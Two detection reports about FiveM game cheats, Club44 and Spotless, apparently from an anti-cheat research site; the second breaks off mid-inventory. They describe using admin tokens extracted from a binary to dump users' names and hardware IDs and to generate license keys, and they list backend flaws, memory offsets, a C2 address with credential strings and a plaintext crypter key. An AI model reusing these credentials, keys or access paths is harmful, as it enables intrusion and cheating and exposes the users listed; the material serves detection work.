/api/silent/status (hwid, action) ADMIN ROUTES (Authorization + X-Admin-Secret): GET /api/silent/list → Returns ALL users GET /api/blacklist/list → Returns full blacklist POST /api/blacklist/check (hwid) POST /api/blacklist/add (hwid) POST /api/blacklist/remove (hwid) POST /api/silent/create (username, password, hwid, days) POST /api/keys (quantity: 1-100, durationDays: 1-99999) POST /api/register (username, password, hwid, key) Next.js Server Actions (UNAUTHENTICATED): silentAuth → hash: 40540feb4104b3e39fc568... silentSetStatus → hash: 60937fac4757d8b8a5e3a... silentConfigLoad → hash: 4093f02d4e640e02af2d8... silentConfigSave → hash: 60383dea9c05f903181f1... The Authorization token and X-Admin-Secret are hardcoded in the `lsasvc.mof` client binary — extractable via static analysis. Both tokens together grant full admin access: user enumeration, blacklist management, user creation, and license key generation. The Next.js server actions are exposed without authentication entirely. The password field in `/api/silent/auth` is ignored — only username and HWID are checked. Any password works. Every API error message is in Portuguese. Live User Database — 149 Users Dumped ------------------------------------- Using the admin credentials extracted from the binary, the full Club44 user database was dumped. At the time of capture: 149 total users, 104 active, 43 expired, 3 banned. The status distribution reveals the real-time operational state of the cheat infrastructure. 149 Total Users 104 Active 43 Expired 3 Banned Status Distribution (Live Snapshot) INJECT: 3 users ← currently injecting IDLE: 102 users ← authenticated, not running UNLOAD: 28 users ← recently unloaded CLEANER: 9 users ← running cleanup routines UPDATE\_CONFIG: 4 users ← syncing cloud config Cheat Feature Usage Across Active Users ESP Enabled: 135 users (91%) Silent Aim: 108 users (72%) Aimbot: 91 users (61%) Triggerbot: 13 users ( 9%) Anti-Aim: 5 users ( 3%) No Clip: 3 users ( 2%) God Mode: 2 users ( 1%) Invisible: 0 users ( 0%) Sample User Records (with Per-User Cheat Config) User #1 "tragedysilent" — Status: INJECT — Active since 2026-04-11 HWID: b297a9f43c52325a82ad6292d52e59ca8a134e67 Config: aimbot=ON (FOV:24), silentAim=OFF, ESP=ON, skeleton=ON User #63 "ajnigger" — Status: IDLE — Active since 2026-04-13 HWID: 4c2ec1d2626b54ce3f614bee1f52155ba7a6005c Config: aimbot=ON (FOV:230), antiAim=ON, ESP=ON User #100 "jefe" — Status: IDLE — Blacklisted HWID: e6742f3a445f9e0426704cf8a1392cb842234344 Blacklist reason: "https://discord.gg/hypersclubhouse" User #64 "tiger" — Status: IDLE — Blacklisted HWID: 624488a34910e25e85891521a56576cbb5301cc8 Blacklist reason: "Pentest - authorized by owner" The blacklist contains 13 HWIDs, but only 3 map to actual user accounts — the other 10 are orphaned or pre-emptive bans with no matching user record. One blacklist entry's reason is a Discord invite link. Another explicitly states "Pentest - authorized by owner" — confirming that at least one individual had authorized access to probe the system. There is no account deletion endpoint; accounts persist forever. Every user's cheat configuration is accessible via `/api/silent/config/load` with just the Authorization header — no per-user authentication. Any user who knows the Authorization token (which is hardcoded in the binary they already have) can read every other user's config. The developer did not implement per-user access control on the config endpoint. This is the same developer who charges $200 for the "Upgraded" tier. Cheat Menu — Full Feature Map ----------------------------- The complete cheat menu structure was recovered from the decompiled `club44_cheatmenu.js` frontend bundle. Every toggle, slider, color picker, and keybind is documented below. This is the full feature set that Club44 users are paying for. AIM ASSISTANCE AIMBOT: Toggles: Enabled, Show FoV, Visible Check, Ignore Deads, Closest in FoV, Humanize Aim, Prediction, Closest Bones, Target NPC Sliders: FoV (1-360px), Max Distance (10-1000m), Smooth X (1-100), Smooth Y (1-100) Keybind: Toggle Key (configurable) SILENT AIM: Toggles: Enabled, Show FoV, Visible Check, Ignore Deads, Closest In FoV, Closest Bones, Shoot NPC, Magic Bullet Sliders: FoV (1-360px), Max Distance (10-1000m), Miss Chance (0-100) TRIGGERBOT: Toggles: Enabled, Shoot NPC, Visible Check, Ignore Deads Sliders: Max Distance (10-1000m), Reaction Time (0-500ms) VISUALS / ESP PLAYER ESP: Toggles: Enable ESP, ESP Switch, Show NPC, Visible Check, Exclude Deads, Preview Window, Box, Distance, Skeleton, HeadCircle, HealthBar, ArmorBar, Names, Weapon Name, Bubbles, Admin Alert Sliders: Render Distance (10-1000), Head Circle Size (0.1-5) Colors: Visible/Invisible variants for Box, Skeleton, HeadCircle + HealthBar VEHICLE ESP: Toggles: Enable ESP, ESP Switch, Show Lock State, Name, Distance, Marker EXPLOITS LOCAL PLAYER: Self: God Mode, Damage Absorption, No Clip, Invisible, Solo Session, Bubbles, Anti Bubbles, Fake Lag, Infinite Combat Roll, No Collision, No RagDoll, Infinity Stamina Misc: Revive, Suicide, Set Health, Set Armor, Throw Vehicle, Break Wheels, Fix Current Vehicle Weapon: Remove Spread, Remove Recoil, Infinite Ammo, No Reload Other: NoClip Speed (1-500), Modify Weapon Size (0.1-10) TELEPORT: Waypoint Teleport, Teleport to Vehicle, Save Position, Load Position CLOUD CONFIG: Save/Load Config, Show Feature List Window, Hide From Capture, Bypass Electron AC FiveM Version: 3258 / Cheat Version: 1.0.0 Monitor \[1\], Unload "Hide From Capture" and "Bypass Electron AC" are the only two features in the list that suggest any awareness of detection. Everything else is a standard feature list that could be copied from any public FiveM cheat menu tutorial. The "Admin Alert" toggle under Player ESP is particularly telling — it suggests Club44 users are being detected by server admins frequently enough that the developer added a feature to warn when an admin is nearby. Payment Infrastructure — Stripe Integration ------------------------------------------- Club44's payment infrastructure was recovered from the decompiled `club44_products.js` bundle. They process payments through Stripe with live checkout links, support 7 currencies, and operate a three-tier pricing model. The Stripe checkout links below are the actual production payment endpoints. Pricing Tiers (USD) PUBLIC (Usermode bypass): Monthly Solo: $39.99/mo Lifetime Solo: $125 Lifetime Duo: $185 UPGRADED (Kernel bypass): Lifetime Solo: $200 Lifetime Duo: $250 Lifetime Trio: $300 CUSTOM (1-of-1 build): Lifetime Solo: $350 Lifetime Trio: $600 Currencies: USD, EUR (0.85x), GBP (0.74x), CAD (1.37x), AUD (1.42x), NZD (1.68x), ILS (3.15x) Live Stripe Checkout Links (Production) Public Monthly: buy.stripe.com/14A14mb6mftg38Y7vu5ZC17 Public Lifetime: buy.stripe.com/4gMfZgdeu0ym8tidTS5ZC19 Public Duo: buy.stripe.com/14AdR83DUbd0aBq9DC5ZC1l Upgraded Solo: buy.stripe.com/6oUbJ00rI4OC10Q0325ZC0M Upgraded Duo: buy.stripe.com/8x28wOa2i80OdNCcPO5ZC0N Upgraded Trio: buy.stripe.com/4gMcN46Q63Ky6la9DC5ZC0O Custom Solo: buy.stripe.com/3cIeVcgqG6WKfVK5nm5ZC1C Custom Trio: buy.stripe.com/3cI4gyb6mftgeRGeXW5ZC1D The payment success page redirects users to Discord (`discord.gg/club44`) to open a "Purchase Redemption Ticket" — meaning key delivery is manual, not automated. For a product that charges $350 for the "Custom" tier, the fulfillment pipeline is a Discord DM. The `club44_payment.js` bundle includes confetti animations on the success page, because the developer prioritized celebration particles over automated key delivery. Analytics events are stored in localStorage under `club44_analytics`, capped at 100 events, tracking every purchase click with product name, price, and page URL. The "phone cheat" integration links to `clubsilent.net` — "Club Silent" — which appears to be the backend brand name for the same operation. License Key Generation — Dumped Keys ------------------------------------ Using the admin API, license keys were generated across all key pools. The key format is `CLUB-REGISTER-XXXXX-XXXXX-XXXXX-XXXXX`. The admin endpoint `POST /api/keys` accepts `quantity: 1-100` and `durationDays: 1-99999` — meaning anyone with the hardcoded admin credentials can generate unlimited license keys with arbitrary durations up to 273 years. Sample Keys (5 key pools dumped) keys\_clubx.txt: CLUB-REGISTER-R4S14-TOL02-Y4YOF-EDRV4 CLUB-REGISTER-4QM0G-QTYB5-U5OPJ-SGJNQ CLUB-REGISTER-WMQ9G-YHL79-2V6IU-WVT62 ... keys\_private.txt: CLUB-REGISTER-TRA3C-4JFZO-UHLHJ-O4GT7 CLUB-REGISTER-B01ST-2F7DD-GBQ1G-KI9ZM CLUB-REGISTER-OO7RR-NHTFN-V5JC0-1JC6J ... keys\_external.txt, keys\_gosth.txt, keys\_public.txt — same format Key Pools: clubx, external, gosth, private, public Format: CLUB-REGISTER-\[A-Z0-9\]{5}-\[A-Z0-9\]{5}-\[A-Z0-9\]{5}-\[A-Z0-9\]{5} The existence of five separate key pools — "clubx", "external", "gosth", "private", and "public" — suggests either multiple distribution channels or reseller tiers. The "gosth" pool name matches GOSTH, another FiveM cheat product that has its own detection page on this site, suggesting Club44 may share infrastructure or resell keys with other cheat providers. All keys follow the identical format and are registered through the same `/api/register` endpoint. API Vulnerabilities — Complete List ----------------------------------- The following vulnerabilities were identified during the infrastructure analysis. Every single one is exploitable with knowledge extracted solely from the Club44 binary that paying customers already possess. CRITICALPassword field ignored in /api/silent/auth — only username+HWID checked, any password works CRITICALAdmin API accessible with static Authorization + X-Admin-Secret headers (no rotation, no per-user auth) CRITICALAuthorization token and X-Admin-Secret hardcoded in lsasvc.mof binary (extractable via static analysis) CRITICALKey generation endpoint allows creating up to 100 keys at once with durations up to 99999 days HIGHNo rate limiting on any API endpoint HIGHNo account deletion endpoint exists (accounts persist forever) HIGH/api/silent/config/load returns cheat configs for ANY username with just the Authorization header HIGHNext.js server actions exposed without authentication (silentAuth, silentSetStatus, silentConfigLoad, silentConfigSave) MEDIUMSupabase PostgREST leaks all table names via error hints MEDIUM10 of 13 blacklisted HWIDs have no matching user (orphaned or pre-emptive bans) LOWAll API error messages in Portuguese leak developer locale and framework info The combination of hardcoded admin credentials in a distributed binary, no rate limiting, and unauthenticated server actions means that every Club44 customer has — embedded in the binary they downloaded — the keys to the entire operation. Any customer with a hex editor and basic HTTP knowledge can enumerate the full user list, generate unlimited license keys, and modify any user's config. The developer built a system where the admin credentials are shipped to every person who pays them. Website Source — "Maximum Security" ----------------------------------- The Club44 website (`club44_index.html`) sets comprehensive security headers in meta tags: X-Frame-Options DENY, Content-Security-Policy, Cross-Origin-Opener-Policy, Cross-Origin-Embedder-Policy, and Cross-Origin-Resource-Policy. The CSP policy includes `'unsafe-inline' 'unsafe-eval'` in script-src — immediately undermining the policy's purpose. The connect-src allows `*.supabase.co` and `discord.com`. Website Metadata Title: "Club 44 Bypass" Tagline: "Stay Hidden, Stay Ahead." Author: "Club 44" Built with: GPT Engineer (cdn.gpteng.co in CSP) Fonts: Geist + Geist Mono (Google Fonts) Database: Supabase (\*.supabase.co in CSP) Discord: discord.gg/club44 Brand: "Club Silent" (clubsilent.net — phone cheat) The CSP includes `cdn.gpteng.co` — GPT Engineer, an AI website builder. The developer built a cheat website with an AI tool, set "Maximum Security" headers that include `unsafe-eval`, and then hardcoded the admin credentials in the binary they distribute to customers. The marketing copy says "Stay Hidden, Stay Ahead." The binary says `Club44-FiveM-External/1.0` in every HTTP request. Memory Strings — What's Actually Inside --------------------------------------- These strings survive in the binary verbatim. Any string scanner, memory scanner, or YARA rule touching the first or third entry catches Club44 instantly. Strings Extracted from Binary "Club44-FiveM-External/1.0" ← User-Agent announces itself to every log "Api/2.0.0 (80ed6bd50b1)" ← secondary UA "Falha NtCreateThreadEx" ← peak Brazilian dev moment "data\\cache\\crashometry" "StealVehicle" "/api/cloud/import?username=" The presence of `"Club44-FiveM-External/1.0"` and `"Falha NtCreateThreadEx"` as plaintext ASCII literals in a shipping binary is the kind of thing that happens when you skip the step of opening your own product in strings.exe before distributing it. The secondary User-Agent `"Api/2.0.0 (80ed6bd50b1)"` contains a build hash — another unintended attribution artifact. `"StealVehicle"` is a literal config key name; the game feature you're paying $50/month for is named after what it does, helpfully, in plain text, in memory, where any memory scanner can read it. The `crashometry` path suggests the developer attempted to implement crash telemetry. Presumably that telemetry was also receiving the "Falha NtCreateThreadEx" messages before the error handler deleted System32. Aimbot Logic — They Think This Is Genius ---------------------------------------- The aimbot implementation recovered from decompilation at `0x14006a4f0` spans 116 XMM floating-point operations. The struct layout is fully recovered. It is standard 2015-era aimbot logic, packaged in a subscription model. Recovered AimConfig Struct — 0x14006a4f0 // Main aimbot function at 0x14006a4f0 (116 XMM floating-point ops) struct AimConfig { float target\_x, target\_y; // +0x38 +0x3c float current\_x, current\_y; // +0x68 +0x6c float fov\_limit\_x, fov\_limit\_y; // +0x9c +0xa0 float smooth\_x, smooth\_y; // +0xa4 +0xa8 float spread\_factor; // +0xac bool prediction\_enabled; // +0xc1 bool closest\_fov\_enabled; // +0xc3 }; Triggerbot at `0x14008d91f` — crosshair box check + auto fire. Closest-in-FoV selector at `0x14002ae47`. Prediction formula recovered verbatim: `new = current + (target - current) * smooth_factor`. This is linear interpolation — lerp — the same prediction "algorithm" in every public aimbot tutorial written since 2012. Standard 2015-era aimbot logic presented as a $50/month subscription. The `closest_fov_enabled` flag at `+0xc3` controls the target selection mode advertised in Club44's marketing as "Closest FoV" — which is the simplest possible target selection algorithm: iterate entity list, compute angular distance from crosshair, pick the smallest value. This is the entire "FoV targeting" feature. It is one loop and one comparison. Club44 charges for this. The 116 XMM operations look impressive until you realize they are the compiler's output for a handful of floating-point comparisons and assignments on a struct that fits in under 200 bytes. There is nothing sophisticated here. The struct was fully reversible from a single decompiler pass. Detection implication: the AimConfig struct offsets above can anchor a memory signature that identifies Club44 in any memory scan regardless of ASLR, since the offsets are relative to the struct base and the struct layout does not change between builds without a code change. Cloud & C2 Endpoints — Very "Secure" ------------------------------------ Club44 implements a cloud configuration sync system. The endpoints recovered from the binary are as follows — all contacted using the `Club44-FiveM-External/1.0` User-Agent, with TLS certificate pinning that the developer believes makes the traffic undetectable: Recovered C2 Endpoints POST /check POST /api/cloud/import?username= POST /api/cloud/export GET /players.json The JSON payload transmitted to the cloud endpoints on sync: Cloud Sync Payload — Recovered from Decompiled Network Handler { "username": "yourname", "hwid": "yourhwid", "config": { "Aimbot": true, "Invisible": true, "StealVehicle": true, "Closest FoV": true } } Uses CPR (libcurl wrapper) + TLS certificate pinning. The C2 domain is encrypted at runtime and falls back to LOCAL mode if the server is unreachable. TLS certificate pinning does not prevent detection — it prevents man-in-the-middle interception. Your HWID and config are still transmitted in plain JSON to a server run by people who delete System32 on error. The TLS handshake itself, to a domain that resolves to Club44 infrastructure, is visible in any network flow log. The pinning prevents a researcher from inspecting the payload in transit; it does not prevent a researcher from observing that the connection was made. The config key names in the payload — `"Aimbot"`, `"Invisible"`, `"StealVehicle"`, `"Closest FoV"` — match the string literals found in the binary and the UI labels visible in Club44 screenshots. The same developer who named the config key "StealVehicle" and shipped "Falha NtCreateThreadEx" in the production binary is the one who implemented the "secure" cloud sync that transmits your HWID to their server. Consider what that HWID is being used for, given that the same binary contains a function that transmits your HWID to a blacklist endpoint immediately before destroying your operating system. Entity Struct — Fully Reversed ------------------------------ The entity struct layout used by Club44 to read game state from FiveM process memory is fully recovered from the decompiled external cheat module. The offsets below are stable across Club44 builds and provide a complete memory signature for the entity reading logic: Entity Struct Offsets — club44\_decompiled.c +0x14 → alive flags +0x170 → is\_local\_player +0x1c0 → player slot +0x2a0 → scale multiplier +0x2bb → visibility byte +0x378 → parent vehicle ptr Globals: base+0x4040 = local player base+0x4b00 = entity list base+0x4e00 = vehicles The entity struct is read directly from FiveM process memory via the external cheat's memory reading loop. The visibility byte at `+0x2bb` is used by the ESP and wallhack features. The parent vehicle pointer at `+0x378` feeds the vehicle theft detection used by the `StealVehicle` feature. The global at `base+0x4b00` is the entity list head iterated by the aimbot target selector. These offsets are hardcoded in the binary — not resolved dynamically, not obfuscated. If FiveM updates its memory layout and changes these offsets, Club44 breaks immediately and silently. If Club44 does not break, the offsets have not changed and these values remain valid as detection anchors. Either way, the fully recovered struct layout is documented here for use in memory forensics and signature generation. Detection --------- Club44 is detectable by four independent methods, any one of which is sufficient. The User-Agent check requires no access to the suspect machine at all — only network logs. 1 ### Search Network Logs for "Club44-FiveM-External/1.0" This is the highest-yield detection method because it requires no screenshare, no access to the suspect machine, and no cooperation from the user. If your server infrastructure or game server proxy logs HTTP User-Agent strings, search for: `Club44-FiveM-External/1.0` This string is present in every HTTP request Club44 makes. It will appear in web server access logs, proxy logs, firewall logs, DNS over HTTPS request headers, and SIEM telemetry. Any match in your historical network logs to this User-Agent string identifies a Club44 user. The search can be run retroactively against your entire log retention window. For screenshare sessions with the user present, check browser network traffic or proxy history for this string. If the machine was running Club44 at any point while networked through a monitored gateway, the string will be in the logs. 2 ### SystemSettingsBroker.exe Modules in System Informer Open System Informer (formerly Process Hacker) and locate `SystemSettingsBroker.exe` in the process list. Double-click to open the process properties, then navigate to the Modules tab. In the module list, look for any of the following, which have no legitimate reason to be loaded in the Windows Settings host process: * —`d3d11.dll` (Direct3D — no reason to be here) * —`XInput1_4.dll` or any XInput variant * —`winhttp.dll` loaded from an unexpected path * —Any module without a valid file path on disk (memory-only) The presence of any of these in SystemSettingsBroker.exe is a positive detection without requiring any further analysis. 3 ### Large Private RWX Memory Region in SystemSettingsBroker.exe In System Informer with SystemSettingsBroker.exe selected, navigate to the Memory tab. Look for any private memory region with RWX (Read/Write/Execute) permissions in the 5.1–5.5 MB size range. The injected PE32+ payload is mapped at base address **0x140000000**. A private RWX allocation of this size is anomalous in any Windows system process. The Windows Settings infrastructure does not allocate large private executable regions. Any match on both the RWX permission set and the approximate size range (5.0–5.5 MB) in this specific process is a high-confidence indicator of the Club44 injection payload being present in memory. If Club44 is not currently running but was recently active, the memory region will not be present. In that case, rely on the network log check (Step 1) and prefetch evidence (check for Club44 loader executable entries in `C:\Windows\Prefetch\`). Verdict ------- Club44 is a competent-looking interface wrapped around code that will BSOD your PC if something goes wrong, written by a developer who forgot to strip their Portuguese error messages and appears to believe that "TLS certificate pinning" and "undetectable" are synonymous terms. The error handler is not a security feature. It is what happens when a developer writes cleanup code without understanding what System32 is for. The hardcoded User-Agent string is not a deliberate misdirection. It is what happens when a developer has never opened a proxy log. Club44 is detectable by four independent methods. The most powerful requires nothing more than a string search in your network access logs — a search that can be run retroactively, silently, and without the user's knowledge. The Club44 developer gifted every server administrator in their potential user base a perfect, permanent, irremovable IOC in the form of a hardcoded HTTP header. The customers who kept using Club44 after the BSOD reports began are a tribute to the persuasive power of a nice ImGui skin. The developers who shipped this binary — with System32 deletion in the error handler, Portuguese debug strings in the binary, and a self-identifying User-Agent in the HTTP layer — have produced something that merits being used as an instructional example of how not to write software, in any context, for any purpose, at any level of the software development curriculum. --- # Spotless Bypass — Detection Report | Clubhouse AC Research · Clubhouse AC Paid Engagement·Bypass Detection·Kernel Evidence·Jun 5, 2026 Spotless Bypass — Detection Report ================================== A client paid us to investigate this. We are not disclosing the reason. Everything documented here — every string, every function, every credential — came directly from the files. This report is for server administrators, DFIR practitioners, and anti-cheat researchers only. Spotless is a full-stack FiveM anti-cheat bypass: a kernel driver that blinds ETW and manually maps DLLs, an auth module that steals Discord tokens and can BSOD banned machines, a custom AES encryptor whose key is sitting in plaintext in the binary, a launcher with 28 FiveM process target strings, and an injector DLL with a tighter 16-target build map. The decrypt workflow did not come from a private conversation. The developer left the instructions sitting inside `crypt.exe`: Portuguese UI strings tell operators to drag payloads onto the crypter, and the AES key, salt, and CBC pipeline appear beside those instructions. Everything below comes from the recovered Spotless file set, archive notes, and validation of the local decrypt behavior. Kernel Driver neguin.sys · VolCache Token Theft Discord · 3 variants BSOD Capable NtRaiseHardError crypt.exe Leak AES key · PT-BR UI Research Dossier Evidence Set 11 files / 80 MB Every user-requested file is represented with parsed metrics and findings. C2 93.127.141.9:5000 DmcAuth / TZProject infrastructure and auth endpoints. Crypto AES-256-CBC Instructions and key recovered from crypt.exe, not a private tip. FiveM Map 28 process strings bananacomleite.exe covers builds 1604 through 3570 plus generic names. Table of Contents [Executive Summary](https://clubhouseac.shop/research/spotless-bypass-detection#executive-summary) [File Inventory & Hashes](https://clubhouseac.shop/research/spotless-bypass-detection#file-inventory) [Evidence Corpus](https://clubhouseac.shop/research/spotless-bypass-detection#evidence-corpus) [Developer Intelligence](https://clubhouseac.shop/research/spotless-bypass-detection#developer-intelligence) [Full Loader Chain](https://clubhouseac.shop/research/spotless-bypass-detection#loader-chain) [Component Analysis](https://clubhouseac.shop/research/spotless-bypass-detection#component-analysis) [C2 Server Intelligence](https://clubhouseac.shop/research/spotless-bypass-detection#c2-intelligence) [Authentication System](https://clubhouseac.shop/research/spotless-bypass-detection#auth-system) [Crackability Risk](https://clubhouseac.shop/research/spotless-bypass-detection#crackability-risk) [Cheat Features](https://clubhouseac.shop/research/spotless-bypass-detection#cheat-features) [Kernel Driver Details](https://clubhouseac.shop/research/spotless-bypass-detection#neguin-sys) [Credential Theft](https://clubhouseac.shop/research/spotless-bypass-detection#token-theft) [Anti-Detection Mechanisms](https://clubhouseac.shop/research/spotless-bypass-detection#anti-detection) [HWID Algorithm](https://clubhouseac.shop/research/spotless-bypass-detection#hwid-algorithm) [Encryption & Cryptography](https://clubhouseac.shop/research/spotless-bypass-detection#crypto) [IOCTLs](https://clubhouseac.shop/research/spotless-bypass-detection#ioctls) [Detection Signatures](https://clubhouseac.shop/research/spotless-bypass-detection#detection-signatures) [YARA Rules](https://clubhouseac.shop/research/spotless-bypass-detection#yara-rules) Executive Summary ----------------- Kernel Capability Unsigned driver, manual mapping, ETW blinding, process protection, and file hiding. `neguin.sys` exposes `\Device\VolCache`, maps DLLs into FiveM, steals a SYSTEM token by copying the PID 4 token, strips VM access through `ObRegisterCallbacks`, and hides prefetch, WER, and crash-dump artifacts. Credential Theft Discord token harvesting is built into the auth module. `MB.dll` scans Discord, Discord PTB, and Discord Canary LevelDB folders, pulls token material, collects public IP and computer identifiers, then posts activity to a hardcoded Discord webhook and C2. Destructive Enforcement Banned machines can be forced into a BSOD. When the backend returns `banned`, the module dynamically resolves `RtlAdjustPrivilege` and `NtRaiseHardError`, enables shutdown privilege, and crashes the system with `0xc0000420`. Crypto Failure crypt.exe documents the workflow and stores the key material in the binary. The Portuguese UI tells operators to drag a payload onto `Crypter.exe` for in-place encryption or decryption. The binary also contains the AES password, `DmcAuth-salt`, SHA-256 KDF, and CBC mode strings. At a glance →Built by at least three distinct developer/build identities: TZX for the launcher, Gun / KCustom for payload DLLs, and swift for the fivem-spoofer driver-loader lineage. →Live C2 observed at 93.127.141.9:5000, with api.tzproject.com and tzproject.com crossover. →The file-backed evidence confirms C2 credentials, endpoints, webhook paths, and DmcAuth/TZProject strings. →MB.dll contains SpotlessPriv2026, tying the private/VIP build to the Spotless branding. →All tier folders share the same code; tiering is enforced server-side. →fulano.dll targets 16 FiveM process names; bananacomleite.exe carries a broader 28-string launcher map. File Inventory & Hashes ----------------------- FileTypeMD5Purpose bananacomleite.exePE32+ x64 EXEfrom analysisMain launcher/UI, libcurl networking, ImGui, D3D11. bufa.dllPE32+ x64 DLLfrom analysisDriver loader, hardware virtualizer, cleaner, WinHTTP auth. neguin.sysPE32+ x64 SYSfrom analysisKernel driver for manual mapping, token copy, ETW blinding, hooks. fulano.dllPE32+ x64 DLLfrom analysisCheat module v1 with aimbot, flickbot, silent aim, triggerbot, ESP. v3.dllPE32+ x64 DLL87ec3469742c973ddd2326a20cb62089Cheat module v3 with ElectronAC bypass, ESP, exploits, radar. crypt.exePE32+ x64 EXEec7409f6b4d8a65f32a2f15d89efc7c1AES-CBC encryptor/decryptor for payload distribution. kCUGOZADO.dllEncrypted payload6b2e7faf8f34be92aada35360c37fd49Auth, spoofer, injector payload for CTM/PBL/PVT/SLT variants. 1kCUGOZADO.dllEncrypted payloadidentical code to kCUGOZADOBulk-license variant with shared C2 configuration. MB.dllPE32+ x64 DLLunique buildPrivate/VIP tier auth, C2, Discord token theft, BSOD enforcement. Variant folders `CTM`, `PBL`, `PVT`, and `SLT` share identical loader code. The visible tier labels are mostly packaging; enforcement happens through the backend. `MB.dll` is the outlier and carries the private string `SpotlessPriv2026`. Evidence Corpus — All 11 Requested Files ---------------------------------------- This audit pass was run directly over the requested Spotless files in the research archive. Each card below lists parsed function count, string-table count, import count, core PE sections, and evidence that appears in that specific file. The section is scoped to the exact eleven files requested for the page update. 80 MB DECOMP text reviewed 19,824 function entries 16,572 string-table entries DECOMP\_bananacomleite.exe.txt bananacomleite.exe · launcher / UI 20.35 MB 5,780 Funcs 4,024 Strings 258 Imports Largest DECOMP export in the set. It combines a user-facing ImGui launcher, libcurl networking, TLS public-key pinning, GPU-friendly exports, and the widest FiveM process map. Sections .text 0x215800 · .rdata 0x6c400 · .data 0x15839c · .fptable 0x200 * Exports NvOptimusEnablement and AmdPowerXpressRequestHighPerformance and imports D3D11CreateDevice plus DwmSetWindowAttribute for the launcher surface. * String table includes libcurl 8.2.1-DEV, nlohmann/json 3.11.2 type names, sha256// public-key pinning, and CRYPT32 certificate-chain APIs. * Developer path and PDB artifacts point to D:\\Projets\\TZX\\TZX\\ and D:\\Projets\\TZX\\x64\\Release\\Module.pdb. * Reads CitizenFX.ini and packages.json and carries 28 FiveM process strings covering builds 1604 through 3570 plus generic GameProcess/GTAProcess names. DECOMP\_bufa.dll.txt bufa.dll · bypass core / driver loader 4.87 MB 1,255 Funcs 312 Strings 206 Imports Operational bypass layer that bridges user mode into the driver and performs filesystem, registry, crypto, session, and cleanup activity. Sections .text 0x9e600 · .rdata 0x1b200 · .data 0xd744 · .tls 0x200 * Imports DeviceIoControl, FindFirstFile variants, WTSGetActiveConsoleSessionId, SHGetFolderPathA, CryptAcquireContextA, CryptDeriveKey, CryptEncrypt, and CryptDecrypt. * PDB strings expose \\etw\_hook\\outputs\\x64\\Release\\BFDriverLoader.pdb and, at 1800be878, C:\\Users\\swift\\Documents\\pastes\\fivem-spoofer\\spoofer-drv\\build\\kernel\_hook.pdb. * High-signal strings include HalPrivateDispatchTable, Circular Kernel Context Logger, CitizenFX, and a Session Manager\\Memory Management registry path. * The embedded compiler banner says Welcome to use llvm-msvc; swft/1.0 appears at 1800aebce and is passed into WinHttpOpen, tying runtime network traffic back to the swift PDB handle. DECOMP\_crypt.exe.txt crypt.exe · AES payload crypter 0.38 MB 174 Funcs 167 Strings 124 Imports Small standalone encrypt/decrypt utility. It has no network stack; its behavior is dominated by BCrypt, command-line drag/drop parsing, and Portuguese status dialogs. Sections .text 0x6400 · .rdata 0x3c00 · .data 0xb70 · .pdata 0x800 * Imports BCryptOpenAlgorithmProvider, BCryptCreateHash, BCryptHashData, BCryptFinishHash, BCryptGenerateSymmetricKey, BCryptEncrypt, and BCryptDecrypt. * Plaintext key material and crypto constants appear in strings: ghiRfdTpmhxJxjZ2vAuIWbHXyJlp22jS, DmcAuth-salt, SHA256, ChainingModeCBC, and ChainingMode. * The Portuguese UI tells operators to drag a file onto Crypter.exe and says the file will be encrypted or decrypted in place with the same extension. * Success/error strings include Arquivo descriptografado com sucesso, Arquivo criptografado com sucesso, Erro na descriptografia, and Erro na criptografia. DECOMP\_fulano.dll.txt fulano.dll · injector / cheat module 11.74 MB 3,207 Funcs 1,777 Strings 301 Imports Large injector and cheat module with D3D overlay code, process-memory APIs, a FiveM build matrix, and explicit aim/trigger feature labels. Sections .text 0x473a00 · .rdata 0x278800 · .data 0x57d8 · .pdata 0xae00 * Imports D3D11CreateDeviceAndSwapChain, D3DX11CreateShaderResourceViewFromMemory, VirtualAllocEx, MapViewOfFile, UnmapViewOfFile, LoadLibraryA, and GetProcAddress. * Feature strings include Aimbot, Silent Aim, Trigger Bot, Aimbot > FlickBot, Disable aimbot while flashed, and Disable aimbot through smoke. * Additional overlay strings include Vehicles ESP, Radar, Weapon, FiveM Duplicate, and the 0xfde9 code-page conversion path used around file/open helpers. * The 16-process FiveM map targets builds 2802, 2944, 3095, 3323, 3407, 3570, and 3751 across GameProcess and GTAProcess names. * Spotless branding appears in the UI strings, while the large .rdata block also carries weapon-name tables used by the overlay and targeting menus. DECOMP\_kCUGOZADO\_CTM.dll.txt kCUGOZADO\_CTM.dll · CTM tier loader 5.49 MB 1,249 Funcs 1,280 Strings 325 Imports CTM build with shared DmcAuth C2, login/session flow, webhook logging, BSOD-capable ban enforcement, and an aaaa\\KCustom development path. Sections .text 0xd0a00 · .rdata 0x23800 · .data 0x12fff0 · .pdata 0x3400 * Strings include http://93.127.141.9:5000, FTaC7sHRNwKbrMYR, 470752974bfe5c36, /api/ep/hwid-whitelist-check, /api/ep/init, /api/keys/use, and /api/blacklist/check. * TZX crossover is active in strings and code: api.tzproject.com and tzproject.com are present and copied into stack buffers with builtin\_strncpy. * Ban enforcement strings and imports include RtlAdjustPrivilege, NtRaiseHardError, BANNED, banned, and webhookUrl. * Runtime markers include \\\\.\\VolCache, C:\\Windows\\System32\\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, and swft/1.0 passed to WinHttpOpen. * Build path exposes C:\\Users\\Gun\\Desktop\\aaaa\\KCustom\\Kernel-UI-Protected\\ext\\backends\\imgui\\. DECOMP\_kCUGOZADO\_PBL.dll.txt kCUGOZADO\_PBL.dll · public tier loader 5.61 MB 1,227 Funcs 2,721 Strings 327 Imports Public-tier build. It keeps the same auth, webhook, TZX, D3D11, WTS, registry, crypto, and driver-IOCTL shape, but its build path names the public package. Sections .text 0xd3000 · .rdata 0x23c00 · .data 0x197db0 · .pdata 0x3600 * Shares the 93.127.141.9:5000 C2, 470752974bfe5c36 salt, /api/ep/hwid-whitelist-check, /api/ep/init, /api/keys/use, and /api/blacklist/check. * Login strings enforce Discord ID and password lengths of 17 to 21 characters and display Login failed / Invalid session outcomes. * Runtime strings include \\\\.\\VolCache, C:\\Windows\\System32\\dllhost.exe, Access denied - You are blacklisted, "encrypted":true, api.ipify.org, and swft/1.0. * IOCTL scan includes 0x00222004, 0x80002000, and 0x00222418 in the same driver-control family as CTM, PVT, SLT, MB, and neguin.sys. * Build path leaks C:\\Users\\Gun\\Desktop\\Kernel-Spotless\\KPublic\\Kernel-UI-Protected\\ext\\backends\\imgui\\. DECOMP\_kCUGOZADO\_PVT.dll.txt kCUGOZADO\_PVT.dll · private tier loader 5.59 MB 1,263 Funcs 1,280 Strings 324 Imports Private-tier build with the same auth spine and destructive ban pathway. Its strongest differentiator is the KPrivate development path. 